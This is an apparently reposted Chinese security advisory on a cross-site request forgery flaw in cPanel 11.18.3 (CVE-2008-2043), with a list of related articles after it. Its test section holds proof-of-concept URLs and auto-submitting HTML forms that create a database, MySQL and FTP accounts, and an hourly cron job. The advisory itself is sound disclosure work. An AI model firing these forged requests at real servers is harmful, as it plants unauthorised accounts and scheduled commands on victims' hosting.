cPanel跨站请求伪造漏洞

简介: 发布日期:2008-04-28更新日期:2008-05-05受影响系统: cPanel cPanel 11.18.3 build ID 21703描述: CVE(CAN) ID: CVE-2008-2043cPanel是基于web的工具,用于自动化控制网站和服务器。
发布日期:2008-04-28
更新日期:2008-05-05

受影响系统:
cPanel cPanel 11.18.3 build ID 21703
描述:
CVE(CAN) ID: CVE-2008-2043

cPanel是基于web的工具,用于自动化控制网站和服务器。

cPanel没有验证用户通过HTTP请求所执行的某些操作,这允许远程攻击者通过跨站请求伪造(XSRF)攻击执行仅有管理员才可以执行的操作,包括创建新的数据库、添加新用户等。

<*来源:Rook Security
  
  链接: http://secunia.com/advisories/30027/
         http://www.kb.cert.org/vuls/id/584089
         http://www.rooksecurity.com/blog/?p=7
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

创建数据库:
http://localhost:2082/frontend/x2/sql/adddb.html?db=database_name

创建新的mysql用户:
http://localhost:2082/frontend/x2/sql/adduser.html?user=badmin&pass=badmin

添加ftp用户:
<html>
<form id=1 method=’post’ action=’ http://localhost:2082/frontend/x2/ftp/doaddftp.html’>
<input name=’login’ value=’badmin’>
<input name=’password’ value=’badmin’>
<input name=’quota’ value=’unlimited’>
<input name=’homedir’ value=’/badmin’>
</form>
</html>
<script>
document.getElementById(1).submit();
</script>

每小时运行一次命令行:
<html>
<form id=2 method=’post’ action=’ http://localhost:2082/frontend/x2/cron/editcronsimple.html’>
<input name=’command1′ value=’echo test’>
<input name=’mailto’ value=’junk_address’>
<input name=’minute1′ value=’0′>
<input name=’hour1′ value=’*'>
<input name=’day1′ value=’*'>
<input name=’weekday1′ value=’*'>
<input name=’month1′ value=’*'>
</form>
</html>
<script>
document.getElementById(2).submit();
</script>

目录
相关文章
|
4月前
|
SQL 存储 安全
Web安全-CSRF跨站请求伪造
Web安全-CSRF跨站请求伪造
121 4
|
8月前
|
安全 数据安全/隐私保护
第二轮学习笔记:CSRF跨站请求伪造漏洞
第二轮学习笔记:CSRF跨站请求伪造漏洞
56 0
|
8月前
|
存储 安全 JavaScript
HW常见攻击方式 --XSS跨站脚本攻击
HW常见攻击方式 --XSS跨站脚本攻击
106 0
|
数据安全/隐私保护
CSRF(跨站请求伪造)
CSRF(跨站请求伪造)
131 0
|
SQL 存储 安全
链接注入(便于跨站请求伪造)
安全风险: 可能会劝说初级用户提供诸如用户名、密码、信用卡号、社会保险号等敏感信息 可能会窃取或操纵客户会话和 cookie,它们可能用于模仿合法用户,从而使黑客能够以该用户身份查看或变更用户记录以及执行事务 可能会在 Web 服务器上上载、修改或删除 Web 页面、脚本和文件
740 0
XSRF CRFS(跨站请求伪造,单点登录攻击) 特点和原理
概念:跨站请求伪造(英语:Cross-site request forgery),也被称为 one-click attack 或者 session riding,通常缩写为 CSRF 或者 XSRF, 是一种挟制用户在当前已登录的Web应用程序上执行非本意的操作的攻击方法。跟跨网站脚本(XSS)相比,XSS 利用的是用户对指定网站的信任,CSRF 利用的是网站对用户网页浏览器的信任。
XSRF CRFS(跨站请求伪造,单点登录攻击) 特点和原理
|
存储 JavaScript 安全
跨站脚本攻击(XSS)和跨站请求伪造(CSRF)是什么?区别是什么?底层原理是什么?
跨站脚本攻击(XSS)和跨站请求伪造(CSRF)是什么?区别是什么?底层原理是什么?
936 0
|
机器学习/深度学习 安全 程序员
网络安全-跨站请求伪造(CSRF)的原理、攻击及防御
网络安全-跨站请求伪造(CSRF)的原理、攻击及防御
369 0
网络安全-跨站请求伪造(CSRF)的原理、攻击及防御
什么是CSRF(跨站请求伪造)?
什么是CSRF(跨站请求伪造)?
345 0
什么是CSRF(跨站请求伪造)?
|
存储 SQL Web App开发
xss跨站请求攻击
反射型xss攻击( Reflected XSS)又称为非持久性跨站点脚本攻击,它是最常见的类型的XSS。漏洞产生的原因是攻击者注入的数据反映在响应中。一个典型的非持久性XSS包含一个带XSS攻击向量的链接(即每次攻击需要用户的点击)。

热门文章

最新文章